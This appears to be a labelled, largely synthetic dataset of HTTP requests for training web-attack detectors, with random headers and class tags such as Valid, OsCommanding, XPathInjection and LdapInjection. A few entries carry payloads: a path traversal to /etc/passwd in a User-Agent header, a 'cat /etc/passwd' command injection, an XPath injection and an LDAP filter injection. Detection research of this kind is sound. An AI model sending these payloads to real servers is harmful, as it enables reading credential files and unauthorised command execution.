GET /hG3GZ9/yrakicS43Pa/rLWHGC2vcgoMCE/8otoiPaw/r2SqGi-PYj4lFhZo/c8iI@jGk5_/1aRbinJJ9gunionqlwt/lhil0i4y/g6processing-instructionku.exe?nikiefU2noajw=622&yEu=4uywuS4in&nte0=0128&1Kn4UGZf=msto&isdodOtad=eth&Kfgroup bytmp5Sj3r9=ch+wp&fhoO0nldybeIin=i%40u1yACRNi&st=aROY7kSrf&hedlva=reh%28a%3D%28ia7eao1tat+N&mlt3ussthi=s%5DyaeSrcpo&osgsmeiehg=20375601&dheduijm9aNts0=a3O7R HTTP/1.1
Host: www.eotk.gov
Connection: close
Accept: text/xml;q=0.5, application/zip;q=0.0, text/plain;q=0.7
Accept-Charset: *;q=0.0
Accept-Encoding: gzip, compress;q=0.4, deflate;q=0.4, gzip;q=0.4
Accept-Language: *;q=0.1
Cache-Control: no-cache
Client-ip: 33.41.180.127
Cookie: Hq6@F@r=iframetorm;n8cC8ueeli=Tfelseb;5yA6=eVvu;eaerheAsmIyiere=IdwimgmsiHynem;yepnseic2aTshl=jmjcoosNilagNR4pac;aps=stltey3nsiiguna
Cookie2: $Version="18"
Date: Fri, 23 Feb 07 15:22:21 GMT
ETag: "gCfT-q1sw0jBcBDJP@l"
Expect: 100-continue
From: epmndmfY@vm5t.be
If-Modified-Since: Sun, 15 Jun 08 05:44:06 UTC
If-Unmodified-Since: Thu, 28 Aug 08 03:56:42 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 18 Jun 08 20:25:38 GMT
Max-Forwards: 85
MIME-Version: 4.8
Pragma: teeliO=ts9Rotx
Authorization: Digest qop=ySteten
Range: 9679-,0-89825,53-
Referer: /sgmu5aee/ydrtye/5ignmge/mgroaeti/dltgmjc.gz
TE: deflate,chunked
Trailer: Authorization
User-Agent: \.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/passwd%00.html
UA-CPU: Sparc
UA-Disp: 182,7559,16
UA-OS: Windows NT
UA-Color: color32
Via: 3.7 www.e0Iy.html, e9ehoc/5.9 73.164.17.150
Transfer-Encoding: compress
Upgrade: 1eo/9.5
Warning: 143 www.eihfkbo.htm "7taunsi" "Fri, 01 Apr 05 24:33:27 CET"
X-Forwarded-For: 20.101.217.179
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46030
Start - Id: 8475
class: Valid
GET /rOdansouo/r8Xc_83BIXa-VL-M/4n1GYasnFneBtnhyoo/eG_vwI04OXgtpOkswMSC/HHnservicesHZW7/z4qCdT3h2f7.zq3/eItsdno44ledr/z8NVIfARxujh93Mk1Gy.exe?ejiotfEvan=oe%3Bne%40eE&4NZdocumentoQLur=44445&fAkgtriwiouneen=bsEiorS8aa&toh8aaiaseh=eRO1RtBfk&h6ite8cp=00 HTTP/1.0
Host: 135.240.20.107
Connection: keep-alive
Accept: video/mpeg, image/jpeg;q=0.4, image/gif;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: ut8f=d
Client-ip: 247.231.82.2
Cookie: EritmtogutloIn=ruah>39ixRapasswdn[e;ieUrfnahe=862001;rntea=vthSy eia
Cookie2: $Version="81"
Date: Sun, 21 Sep 08 14:05:53 GMT
ETag: "x-0vskwvvt.CtBrpiL@m"
Expect: btNrwRS=esgoei
From: imIs@osaeiaEd.de
If-Modified-Since: Thu, 10 Mar 05 03:35:19 UTC
If-Unmodified-Since: Fri, 04 Apr 08 13:12:54 CET
If-Match: "jL@PWaxxre90_4."
If-None-Match: "lZWOTtZJWnD4NFR"
If-Range: Sun, 24 Sep 06 15:39:33 GMT
Max-Forwards: 60
MIME-Version: 1.6
Pragma: Ygay3oc='o4gjk'
Proxy-Authorization: Basic ZWRpdWVxaWE6Nmxvb2k=
Authorization: 1Syx tlzemurc=e3ryosi
Range: 27626-91
Referer: /nt2aohnr/oier8i6/menmtbt.php3
TE: gzip;q=0.2
Trailer: Via
User-Agent: s5Zuwy http://www.fs6hs.gov
UA-CPU: 68000
UA-Disp: 8051,5811,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 8509x9996
Via: 5.2 www.iaeS0UGk.tiff
Transfer-Encoding: compress
Upgrade: odk/7.0
Warning: 961 www.ntijm.html "estseteardr" "Thu, 20 Mar 08 23:35:03 CET"
X-Forwarded-For: 53.255.102.214
X-Serial-Number: 3858691762
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8475
Start - Id: 43339
class: OsCommanding
GET /8htpasshrzm-RL-YC/tuxsTb/tobentunereenBsh/gqZ3/TryahT64/HeMteeeam4auNkr/iqkXkdmail0/LG8.html?80eJw=%250a+++cat+++++%250a+%2Fetc%2Fpasswd+++++%250a HTTP/1.1
Host: www.inhpnh.be
Connection: Nfat6iu7
Accept: image/jpeg;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.6
Accept-Language: e9e-oonnm;q=0.5, aoehi-ttantttk;q=0.3, do0ck-oeFidi;q=0.6, i-rd, u29cwwho-6aiennc3;q=0.3
Cache-Control: no-transform
Client-ip: 72.77.48.25
Cookie: E0aiefsC5txnf=032004;etew8u9E9t4ei=kVR4FBEI;sH=aTc;A5S7g=between/uchildjR;vhf=5231
Cookie2: $Version="529"
Date: Sat, 12 Jun 04 15:41:35 UTC
ETag: "ZtsaybANwxvciPTcmh"
Expect: 100-continue
From: aDiswue@0eroLdeg.uk
If-Modified-Since: Tue, 02 Feb 10 11:14:53 GMT
If-Unmodified-Since: Sat, 12 Feb 05 03:01:04 GMT
If-Match: *
If-None-Match: "B1RwyszhI0VMs38O5Y"
If-Range: "4.JV.yFYeE-kl2@q2"
Max-Forwards: 26
MIME-Version: 0.2
Pragma: no-cache
Proxy-Authorization: Digest nc=0dbF188e
Authorization: Digest nonce
Range: -3
Referer: http://atokpWu.be/hoab9h/spasl.dll
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/7.5 (X11; U; Linux i586 7.2; me-se; rv:9.6.5) Gecko/41735195
UA-CPU: 68000
UA-Disp: 260,218,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 331x628
Via: FTP/7.6 191.24.118.161, FTP/4.8 221.157.228.185
Transfer-Encoding: gzip
Upgrade: 8atc6a/5.7, oCej/1.5, Siiai/7.2
Warning: 804 42.58.149.196:9978 "tyrid0" "Sat, 31 Mar 07 01:18:34 UTC"
X-Forwarded-For: 115.149.203.202
X-Serial-Number: 100296896076
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43339
Start - Id: 24382
class: Valid
GET /nrsJmtX0vzPxyO/lO@UCAZSuV1/m0Qndo0lf/a_.shtml?essPsiuetbc=c&ydentrutjfl=4+dt&tGioyU=E&tlir7le=tw46Zzqts&VYrT=7&r3r=2weel&oasaeoefc=zr&v@Tz=6oJ&kih=e&saOhotBaao=06&mfd6o=oft HTTP/1.1
Host: 18.207.20.149
Connection: close
Accept: */*
Accept-Charset: x-mac-chinesesimp, x-mac-cyrillic, windows-1254
Accept-Encoding: gzip, gzip;q=0.3, identity
Accept-Language: *
Cache-Control: max-age=23141
Client-ip: 248.165.100.251
Cookie: mwnnl7tAaee6a=~ci8s\oteawer;tntox5i=l0telnet67;vttpLsrLx=aG_quwO
Cookie2: $Version="518"
Date: Fri, 02 Feb 07 02:00:07 GMT
ETag: "2Wf1wyJ8Y4mt38WOd"
Expect: 100-continue
From: Tieh@ettdu.fr
If-Modified-Since: Wed, 30 Jun 04 05:57:13 UTC
If-Unmodified-Since: Tue, 06 Sep 05 08:52:35 GMT
If-Match: *
If-None-Match: *
If-Range: "dhyrSw@JO-SKpewBNl"
Max-Forwards: 828
MIME-Version: 3.6
Pragma: no-cache
Proxy-Authorization: NTLM ZGE5ZWVjbGVjaW1vb2VuYnRoaWV0c3J1YWgxb2h0MWxkc2hpMG9nbHN0cA==
Authorization: i7sa Sinn=trCo
Range: 18-
Referer: /A4zr9i4/etnjgk/ehinen/r0nek/mhhavaw.bin
TE: gzip
Trailer: Accept-Charset
User-Agent: Mozilla/3.7 (compatible; Konqueror/0.0; Unix; ipsxaE7n)
UA-CPU: 68000
UA-Disp: 801,8735,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 1274x3966
Via: u8h/5.8 221.240.34.116, FTP/2.4 187.179.21.91:825
Transfer-Encoding: identity
Upgrade: ya9/0.7
Warning: 583 www.digi.js "ep3nn0retlwyt" "Wed, 24 Dec 08 19:28:30 CET"
X-Forwarded-For: 231.128.57.40
X-Serial-Number: 2633787147170718759
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24382
Start - Id: 15546
class: Valid
GET /i6cdtle/fq7uGi47J9-mg/sxXp_oqEZTgjaWQC6k./J5TW0/s@4Mn1-o1a0qq/y6-UXbyk5siG3VgFgbo/evpnsat9nnuSlra/WW1ip3e_DYfJPo/easMdeeUolett/Ai0tghimsetotdrh/enc/yg-guxwvPuy@vy5HtAo.htm?9irkztt=31&DIrV@includeOAJaJ=l7bFuNq8w&6iL41=s2bhdtb5ifr%24tperletr HTTP/1.1
Host: 207.60.24.232
Connection: keep-alive
Accept: image/*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: identity, compress;q=0.8, compress
Accept-Language: wd-nhdtu, oqme-hxhtfe, s-Saccafo8;q=0.4
Cache-Control: only-if-cached
Client-ip: 97.239.232.84
Cookie: nirr3h3=input\eN;cesHaed=6765798726;d2ka=eXcraY
Cookie2: $Version="640"
Date: Mon, 30 Jul 07 20:24:54 CET
ETag: "Cqt5eE91-djhUSQE"
Expect: 100-continue
From: Ftobr@eibao.net
If-Modified-Since: Thu, 25 Sep 08 05:24:50 GMT
If-Unmodified-Since: Sat, 22 Oct 05 10:59:30 CET
If-Match: *
If-None-Match: "pc-DDLDtKtE@n_kxkZFb"
If-Range: *
Max-Forwards: 4
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: aei68w feBu6h=iV8ysrhR
Authorization: nvdaOi 71DuReno=rtai7aI
Range: 1-622060
Referer: http://fnrxos.ch/haso/dtsonta/dqdtel/t4oONskF/oemBra.ace
TE: trailers,deflate,gzip;q=0.9
Trailer: Expect
User-Agent: Mozilla/7.4 (Machintosh; U; PPC 4.9; s9-58; rv:4.3.6) Gecko/13935198
UA-CPU: x86
UA-Disp: 8876,6331,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 5730x198
Via: 9.3 205.88.121.35, FTP/9.2 238.16.0.115
Transfer-Encoding: deflate
Upgrade: oou8R/3.5, een2ct/1.0, 2ihe/9.1, S4anr/6.7
Warning: 093 238.27.6.188 "ieimodtr2ng0rf8tn" 
X-Forwarded-For: 144.153.36.75
X-Serial-Number: 4557726217620382027
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15546
Start - Id: 8191
class: Valid
GET /dsxw/a2zSq7AYQDI/3Scuwl4/hsa/Cvcn@T1@A/ifyvand/o6xeZATrG_ptpzJe/ehs9on9se/iJd8uLKfMiEOl/no6rbltrSuoita/X3.css?UEnyxnde=2uBoniaRee&Lmd9rAyeAo7dzde=811231&-MqaB=sodtayaumhn&skuletNlaene=s2wKhiu9h&aiarfta=lprfJuL&mhBusrVW4T=cgBMMSLD-wwy&xo1ecidmoku=108937652 HTTP/1.0
Host: 14.30.194.62
Connection: c5ef
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=09684
Client-ip: 110.38.97.95
Cookie: nh4snioosasuteo=o3E;EenebgMasheKtRe=3254614;epinrstO=278297141;dMy5rlaiepchjed=ll ;dOnminOr=ltrBltaslf4tpubze4;0b5uancn=13
Cookie2: $Version="2"
Date: Tue, 15 May 07 05:56:41 CET
ETag: W/"EOXO9OYaUDsivz7"
Expect: cah1n=aakpb9;omly
From: iyfdu@nabsveeOr.de
If-Modified-Since: Wed, 25 Jul 07 16:34:11 CET
If-Unmodified-Since: Tue, 01 Dec 09 12:25:14 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 05 Jan 05 08:51:23 GMT
Max-Forwards: 6700
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: Basic cW5kcm5pOmdzaWFn
Authorization: NTLM dWVPc3BiaW9laWF0c25tZGRvOG5ockk2c29yc2x0YXR1bnVMM3Rvc3RvMWI=
Range: -635
Referer: /norgearx.php3
TE: gzip,gzip;q=0.9,chunked;q=0.2
Trailer: Accept-Charset
User-Agent: Mozilla/7.7 (X11; U; Linux i386 4.2; b2-he; rv:4.3.3) Gecko/06560195
UA-CPU: StrongARM
UA-Disp: 260,910,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 1852x378
Via: 7.0 www.nmeete.tiff
Transfer-Encoding: deflate
Upgrade: 9o6e/7.7, eaTRi/7.4, yaoEli/5.7, rnj/7.6, pad/2.0
Warning: 689 128.202.115.69 "ilceonto6elpOdo9ca" "Thu, 24 Jun 04 13:57:23 UTC"
X-Forwarded-For: 93.63.20.222
X-Serial-Number: 81045574594520616
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8191
Start - Id: 22155
class: Valid
GET /ol1itur/p5I9BJyTDyH/hnhsd5/Tn5j@o@fhwLtmpQ/tXvIkTtthKxnVQ6RC/i0gpftotd7rsuoh.msf?0eehipaR=qNt&cae3npcutf=eo9fwxa HTTP/1.1
Host: 237.234.186.171:962
Connection: keep-alive
Accept: image/*;q=0.0, video/*;q=0.8, video/mpeg;q=0.1
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: oomavmt-txwtm
Cache-Control: no-store
Client-ip: 190.55.195.238
Cookie: l46ol4qr30e=3;yciS=bsYlidces8oke94;m9heae3raRiie=hkXZFnjO65D
Cookie2: $Version="86"
Date: Wed, 27 Jun 07 19:28:10 GMT
ETag: "uZWI6UIDCcFJPdEv3"
Expect: 100-continue
From: aRiniz@oyso0ono.st
If-Modified-Since: Thu, 02 Feb 06 03:20:09 UTC
If-Unmodified-Since: Sun, 17 Jul 05 22:23:12 CET
If-Match: "wph-IrtkyAZ961TN7KJ5"
If-None-Match: *
If-Range: Thu, 30 Aug 07 15:30:05 UTC
Max-Forwards: 2728
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic c3NpaTp0bGRxNWdl
Authorization: ieU7 itme=8afoe
Range: 92-73058,-4366
Referer: /le0wa/sd8nees8/Eifescv7/da9e/soi2oec.dll
TE: trailers
Trailer: Transfer-Encoding
User-Agent: esEzseceD/1.6
UA-CPU: x86
UA-Disp: 863,374,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 355x1330
Via: 3.3 www.NSiajc.shtml
Transfer-Encoding: compress
Upgrade: axmH4R/4.7, 2t7/0.7, ahIt/4.1, oIscsS/2.4, oeipsn/3.2
Warning: 917 www.soeSgapr.css "c5leeikhcoalpeot4" 
X-Forwarded-For: 77.46.33.144
X-Serial-Number: 89307518698
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22155
Start - Id: 21155
class: Valid
GET /anf.z/wc5Bj1v@FaH/s1afgdeimi/ttpjrtrit2dih9l/iDMw_0oJCdV7YaQ8v.php4?iH4rnbt=l%7EiDsrmu&aseg=8061 HTTP/1.1
Host: www.ajhcts8.fr:1
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: identity, gzip, identity;q=0.3, identity
Accept-Language: *
Cache-Control: max-age=16
Client-ip: 41.203.59.69
Cookie: dsis0=100988;hehgot=$tria
Cookie2: $Version="2"
Date: Sun, 02 May 04 14:14:36 UTC
ETag: W/"uL2g6QkPb09Ijy3yR"
Expect: rsihxz=nuu7
From: dhehtais@ahehpggov.uk
If-Modified-Since: Sat, 24 Jun 06 03:53:20 GMT
If-Unmodified-Since: Tue, 09 Mar 10 14:31:16 CET
If-Match: *
If-None-Match: "fJ1v1Bl5iEapzCG"
If-Range: Fri, 14 Jan 05 15:00:09 UTC
Max-Forwards: 70
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: spnetr snSiU=Eaaulsc
Authorization: Digest realm
Range: 1175-,-288
Referer: http://narrean.de/iossmt/pwZton85/zpcotal/iuticf.php
TE: deflate;q=0.4,trailers,trailers
Trailer: Connection
User-Agent: Mozilla/4.2 (X11; U; Solaris 4.1; hS-sa; rv:5.4.9) Gecko/61543876
UA-CPU: Sparc
UA-Disp: 1305,9206,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 739x758
Via: 5.2 61.134.218.131
Transfer-Encoding: eiRo
Upgrade: iotyCf/8.9, 2dsd6e/9.2
Warning: 554 www.g0den7.shtml "imsucel" "Thu, 03 May 07 11:10:04 CET"
X-Forwarded-For: 204.128.223.43
X-Serial-Number: 041648335
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21155
Start - Id: 16096
class: Valid
GET /0nTV.8ZXR8Oe9z9/o6K-3c/1gn/dwrcseakeddojarlnAla/IdLEocoiefziaaoti/itSOSjNXN/ayD3iizigendodmraj5/ultneeliko/DO91andTDabpQ.jsp?AetiTr=eRW-pGmYO&afiaa2=htc&0tegtAq=oedS6C6&s5wmtceb=sa%5Dehidiv&iSn=+Kl-ult%26ahtaccese&telfr4gzmE9r=76847&eeusSnp=xo-gbMw%40 HTTP/1.1
Host: www.aTvaozlr.fr
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: eth9m0-saNssi, siz-eag, onwtt-H, C6dX-i, tstuhPal-Etfn
Cache-Control: max-age=3
Client-ip: 132.238.67.140
Cookie: BnzhU=sgroup byud;tre1duvy=ra~r;nu1iimsIGn=eadeout;8oLEGyAWa4a=uMereplaceg47s;eautoexecPFhDkC1Bd=xp_|;simAiscas=sc
Cookie2: $Version="28"
Date: Mon, 23 May 05 18:43:24 CET
ETag: W/"DafNdNaZji86rrX"
Expect: i9w3m7=staln
From: Is142lrr@ezhcwau.be
If-Modified-Since: Thu, 04 Feb 10 01:06:23 GMT
If-Unmodified-Since: Sun, 24 Aug 08 21:35:01 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 15 Nov 09 11:00:40 GMT
Max-Forwards: 0
MIME-Version: 3.0
Pragma: ornGhDfe='kte'
Proxy-Authorization: Basic cmlkZXdlOm9panNpc25y
Authorization: Basic c2FsdWRzOms0a29uaGVj
Range: 303812-992,8-0,-1
Referer: /8nsranFe/j8dac.pdf
TE: trailers,gzip,trailers
Trailer: Cache-Control
User-Agent: Mozilla/7.8 (Machintosh; U; Mac OS X 9.1; oe-od; rv:8.1.0) Gecko/86454354
UA-CPU: x86
UA-Disp: 991,4973,32
UA-OS: Linux
UA-Color: color32
UA-Pixels: 892x2376
Via: HTTP/8.4 118.181.169.7
Transfer-Encoding: rLha; neuitil6=hanoe
Upgrade: i4yIiA/2.7, dii5he/8.6, ahi/6.9, hzes7/4.4, 3Ooah/2.1
Warning: 767 www.ohsi.tiff "lE5y8saal" 
X-Forwarded-For: 44.155.173.100
X-Serial-Number: 6495346475
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16096
Start - Id: 7180
class: Valid
POST /nH6HaORM/WhS@mlin7CUK/hN2V3V.TME7@OymT8huh/CLscripth-UE.qoD/wx0qifG3Ky9.asp? HTTP/1.0
Content-Length: 108
Content-Language: ssRu
Content-Encoding: gzip
Content-Location: /srtv4hry/ecrWnxE/eahw3eo.jsp
Content-MD5: Mm1nbGFlZWVzZ21sdHV1ZA==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 13 Feb 06 14:55:21 CET
Last-Modified: Fri, 25 May 07 12:50:14 GMT
Host: www.ssffosa.fr
Connection: close
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: compress, compress;q=0.2, deflate;q=0.7, deflate
Accept-Language: wil6k-ss3dgNyr;q=0.1, Rlomod-mciifrx;q=0.2, sir-uksvciqe, raee-o;q=0.4, idiaid-e1w;q=0.2
Cache-Control: no-transform
Client-ip: 32.243.224.212
Cookie: Apldnhee=oogfo0dfihr6 a no;mc82wtte=oarn;OdhmTrss=ac5;igtsesxhw=ZmttpoxbEn
Cookie2: $Version="19"
Date: Wed, 08 Nov 06 02:54:55 UTC
ETag: "r1IhS7uz5@tIqm6"
Expect: UEr2hto=zbbH1Ao;ullmqe=Mgfkf
From: a0Qar@yilcQa.net
If-Modified-Since: Wed, 25 Feb 09 14:24:47 GMT
If-Unmodified-Since: Tue, 22 Sep 09 13:25:24 UTC
If-Match: "Eo.SUQ8@XC2Qtb@"
If-None-Match: *
If-Range: "Xtkztx0gQ-@ubLTCUIH"
Max-Forwards: 335
MIME-Version: 3.9
Pragma: aqioi='yntc'
Proxy-Authorization: NTLM YWljaTRzd2Vpc3RyTXQ5cjE1YWVPc3VzU2lJaWxtZWlvc2Y=
Authorization: qe3aee eIn0=smDale
Range: 975551-,9376-71358
Referer: /ntwbo/n7Csw/eiTa/tt0i/emeBoe4i.jpg
TE: trailers,chunked
Trailer: Pragma
User-Agent: Mozilla/5.7 (Windows; U; Win 9x 9.5; ve-it; rv:8.6.4) Gecko/99994276
UA-CPU: MIPS
UA-Disp: 337,1594,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 7035x878
Via: 5.2 53.28.167.120:4, FTP/0.9 8.229.129.157:228
Transfer-Encoding: compress
Upgrade: aqreph/7.4, yeImai/7.7
Warning: 892 www.oeiareeu.shtml "skEl0E" "Sun, 11 Jul 04 16:54:27 UTC"
X-Forwarded-For: 113.209.161.140
X-Serial-Number: 94479468040904290
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lesoqnel=95132071&vb=1&rnpUtDv0dCUw=hUp7olWE&9xfZ=f2Q@a3.Nav&sancDtOaliia=dInaeS1qie&Gi3eeso9Iexk=52339978

End - Id: 7180
Start - Id: 7977
class: Valid
POST /ykEgq/saad2Njnr3eryh/tti8t49yuutfenmpI/iY@OzpE1k90LtQ/Mt1nullfqNOJDVora/tntm5pif3ehrtollg.jpeg? HTTP/1.0
Content-Length: 199
Content-Language: a2o8Zei,8n
Content-Encoding: identity
Content-Location: /o5Ht5/eemc.dll
Content-MD5: N3RhZWFvd25zeXRGc29vdQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Jul 09 18:33:45 GMT
Last-Modified: Mon, 08 Jun 09 12:14:04 CET
Host: www.o60dt.st:80
Connection: keep-alive
Accept: image/*, audio/basic;q=0.4
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=1051
Client-ip: 75.162.183.217
Cookie: M054homeFJ=tP0VIi;eeetaThTsgnfst=944;ehl8tl9naap7Hrs=8?nf\>=p
Cookie2: $Version="4"
Date: Thu, 01 Apr 10 10:46:34 UTC
ETag: "vSwg.t8VN@YH431HW"
Expect: a9oS8=esntrd
From: lggvhin@tEusa.fr
If-Modified-Since: Sun, 22 Jun 08 18:33:48 GMT
If-Unmodified-Since: Sun, 01 Oct 06 23:00:47 CET
If-Match: *
If-None-Match: ".3ZRHe4mtxz1@srC"
If-Range: Mon, 05 Apr 10 18:59:23 UTC
Max-Forwards: 8149
MIME-Version: 5.5
Pragma: no-cache
Proxy-Authorization: Basic NnR0ZXg6MWppamloaWg=
Authorization: Basic ZWE4ZGVhTjpvZWx5c2Vl
Range: -607
Referer: /nmedj/ia5aa.nsf
TE: trailers,gzip,deflate;q=0.6
Trailer: User-Agent
User-Agent: Mozilla/2.6 (Windows; U; Windows NT 3.3; es-ng; rv:5.1.7) Gecko/74595296
UA-CPU: x86
UA-Disp: 4676,8640,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 094x6003
Via: FTP/6.8 229.231.218.49, HTTP/1.0 www.sopeeiee.html
Transfer-Encoding: deflate
Upgrade: rRndxQ/4.8, m7j2ro/0.4, xec/7.9, aPodde/0.0, lld/6.5
Warning: 583 50.58.211.108 "lh5crmtllesSieanni" "Mon, 08 Jan 07 08:44:59 UTC"
X-Forwarded-For: 8.49.98.213
X-Serial-Number: 56493
----: --------------------
~~~~~: ~~~~~~~~~~~

fCeLospnsczny=qjjFisls&ssotlnTsp=03&oejLEgyCNeas=sy&Mr84Jestyleaq0=60399126&i4Eatn6nlT=5&ccnhdho=4weimg&imE=eIp07X50&erseixeITh=90984147&uJFtwV=4612109046&esdmooyQwa=na4 chc&enelihhlwous='nwp7eYuop

End - Id: 7977
Start - Id: 35548
class: XPathInjection
POST /cny5oaserouxeda0o/piframewqzGB.jsp? HTTP/1.1
Content-Length: 503
Content-Language: txl,cagk
Content-Encoding: identity
Content-Location: /Notn/b6staey/Tidmxten/scwbhe/3teu6lc.jsp
Content-MD5: ZWVnb0VlYXlJdXNkcG9lYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 07 Jul 06 14:07:23 GMT
Last-Modified: Thu, 12 Nov 09 20:53:59 UTC
Host: www.p3hmwwt.org
Connection: s4irHi
Accept: application/*;q=0.9, audio/x-wav, video/*
Accept-Charset: *;q=0.9
Accept-Encoding: compress, identity, compress;q=0.5, identity
Accept-Language: Tdp-w
Cache-Control: no-store
Client-ip: 20.198.192.186
Cookie: 6a0h6eaUtnraei=1168427;lsock_streamYncxvarN=r2
Cookie2: $Version="705"
Date: Sat, 08 Jul 06 09:02:18 UTC
ETag: W/"gQM0UjWusLn41Ge"
Expect: 100-continue
From: r6prr@rraoosa.cz
If-Modified-Since: Sun, 06 Jul 08 20:29:05 GMT
If-Unmodified-Since: Sun, 25 Apr 10 06:11:16 UTC
If-Match: *
If-None-Match: "ey4TpTgzmWzSm9l_w"
If-Range: Thu, 26 Mar 09 06:52:12 GMT
Max-Forwards: 819
MIME-Version: 7.5
Pragma: erdm='lecsuN'
Proxy-Authorization: NTLM aHJtZTJlYWVzZXIwb2VybGVlb21yOGFuZU5pcnBpam50aQ==
Authorization: Digest qop=bhejopd
Range: -15,703-20624,9752-7
Referer: http://e1lez.de/eeli.tar.gz
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/0.7 (Machintosh; U; PPC 5.2; 2r-kk; rv:9.4.6) Gecko/83976077
UA-CPU: 68000
UA-Disp: 0509,6144,16
UA-Pixels: 5895x804
Via: 2.0 www.nydNn.jpeg
Transfer-Encoding: identity
Upgrade: ihret/7.1, korlrr/8.1, oqs1/4.8, miil/4.8, mtdoz/9.8
Warning: 559 www.obo9.js "F7ceoat8n5sa5ne" "Wed, 18 Nov 09 09:39:58 UTC"
X-Forwarded-For: 20.224.84.217
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eneftxpitivmct=noEedg2hmlew&4.childIO1W_6bt=bsytcooiaep0Opk&etSd2=815344&ugsaeTecrsi=ccmdm&restfsheO1syeu=3qfchnopeneijtlya&em=7     or   count(path/child::node()[position()=((i+j+k+l+1)]     | path/child::*()[position()=(k+1)])=1     or 801=&ana6lsjukCr=69385557&rehaceepia=19893805&mDeod=90295305&F0gOscript6Zbaiframe=1sjo&rl0igr4elpawet=wm0drrwgeta2;|sabo Qfead&brWett=oM87D@cGE0r&eekdNtned=8yqUz3TwuQ&ettB=701860&e6seta=Ys 

End - Id: 35548
Start - Id: 37780
class: LdapInjection
GET /mGknwaaK--yYd/anrunooaHt3icSae/uOYSreplacetylVVlR6JV.png?pwstuoretrtdRE8=948104&nUraren7gs=4&.D3Y3y2L0=bncQ7dN9h&sdatvthae=servicesaedehh&LC00dSST=53751057&GwzdbtaBswtru=09&0Vsspst=%29++%28+%7C+%281coa%3Dw8m*%29 HTTP/1.0
Host: www.Etu7c.st
Connection: ecot6oce
Accept: application/rtf;q=0.5
Accept-Charset: windows-1258, x-mac-greek;q=0.5, iso-8859-5, iso-8859-9;q=0.8, ks_c_5601-1987
Accept-Encoding: 
Accept-Language: sP-AayN
Cache-Control: min-fresh=83393
Client-ip: 233.194.90.144
Cookie: et=37975121;0essi=lDUPbYJx_;es=psi7n>edovar;passwd-GlXThttpTlogqu=hBWGZ8n.E9U1;eemro=aer7ete<
Cookie2: $Version="7"
Date: Thu, 16 Oct 08 18:36:09 CET
ETag: "K8JclCYhB4_YHqlv"
Expect: vaQg=itklittE
From: 0toi@nMoY9ioe.ch
If-Modified-Since: Tue, 06 Dec 05 23:23:38 GMT
If-Unmodified-Since: Tue, 30 Sep 08 06:09:32 CET
If-Match: "OfvDuR9paX9RqvEV7"
If-None-Match: *
If-Range: Sat, 12 Feb 05 10:12:34 GMT
Max-Forwards: 5905
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: ohdon nEbfg=9sctk
Authorization: ruOs2 s7fosnh=weuj
Range: 942-,92-,07-63
Referer: /mea1inii/a8ea3ae/Eirwth/a7yets.gif
TE: trailers,trailers,chunked;q=0.5
Trailer: Range
User-Agent: Mozilla/0.8 (compatible; RRaGenh; WinNT; iiatdd7)
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 807x162
Via: 3.2 www.dsrs.js
Transfer-Encoding: gzip
Upgrade: 1wi/0.9, ue5/8.1, uoi/7.4
Warning: 326 72.4.51.119 "ezthaspMb" 
X-Forwarded-For: 229.226.152.130
